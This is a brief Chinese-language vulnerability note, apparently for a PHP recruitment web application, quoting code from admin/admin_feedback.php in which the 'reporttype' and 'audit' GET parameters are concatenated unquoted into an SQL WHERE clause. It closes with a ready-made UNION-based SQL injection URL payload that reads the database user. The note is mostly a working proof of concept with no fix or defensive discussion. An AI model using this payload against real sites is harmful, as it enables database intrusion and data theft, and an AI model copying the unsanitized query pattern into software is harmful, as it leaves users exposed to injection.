摘要

漏洞文件：admin/admin_feedback.php代码82行： 跟下get_report_list:  $_GET[‘reporttype’]

漏洞文件：admin/admin_feedback.php

代码82行：

if (!empty($_GET['reporttype']))          {                    $wheresql=empty($wheresql)?" WHERE r.report_type=".$_GET['reporttype']:$wheresql." AND r.report_type=".$_GET['reporttype'];          }          if (!empty($_GET['audit']))          {                    $wheresql=empty($wheresql)?" WHERE r.audit=".$_GET['audit']:$wheresql." AND r.audit=".$_GET['audit'];          }          $total_val=$db->get_total($total_sql);          $page = new page(array('total'=>$total_val, 'perpage'=>$perpage,'getarray'=>$_GET));          $currenpage=$page->nowindex;          $offset=($currenpage-1)*$perpage;          $list = get_report_list($offset,$perpage,$joinsql.$wheresql.$oederbysql,$type);          $smarty->assign('pageheader',"举报信息");          $smarty->assign('list',$list);          $smarty->assign('page',$page->show(3));

跟下get_report_list:

function get_report_list($offset,$perpage,$get_sql= '',$type) {     global $db;     $limit=" LIMIT ".$offset.','.$perpage;     if($type==1){        $result = $db->query("SELECT r.*,m.username FROM ".table('report')." AS r ".$get_sql.$limit);        while($row = $db->fetch_array($result))        {        $row['jobs_url']=url_rewrite('QS_jobsshow',array('id'=>$row['jobs_id']));        $row_arr[] = $row;        }     }else{        $result = $db->query("SELECT r.*,m.username FROM ".table('report_resume')." AS r ".$get_sql.$limit);        while($row = $db->fetch_array($result))        {        $row['resume_url']=url_rewrite('QS_resumeshow',array('id'=>$row['resume_id']));        $row_arr[] = $row;         }     }     return $row_arr; }

$_GET['reporttype']

$_GET['audit']

没有’包含。

构造payload:

admin/admin_feedback.php?act=report_list&audit=1%20union%20select%201,2,3,4,5,6,7,user(),9,10%23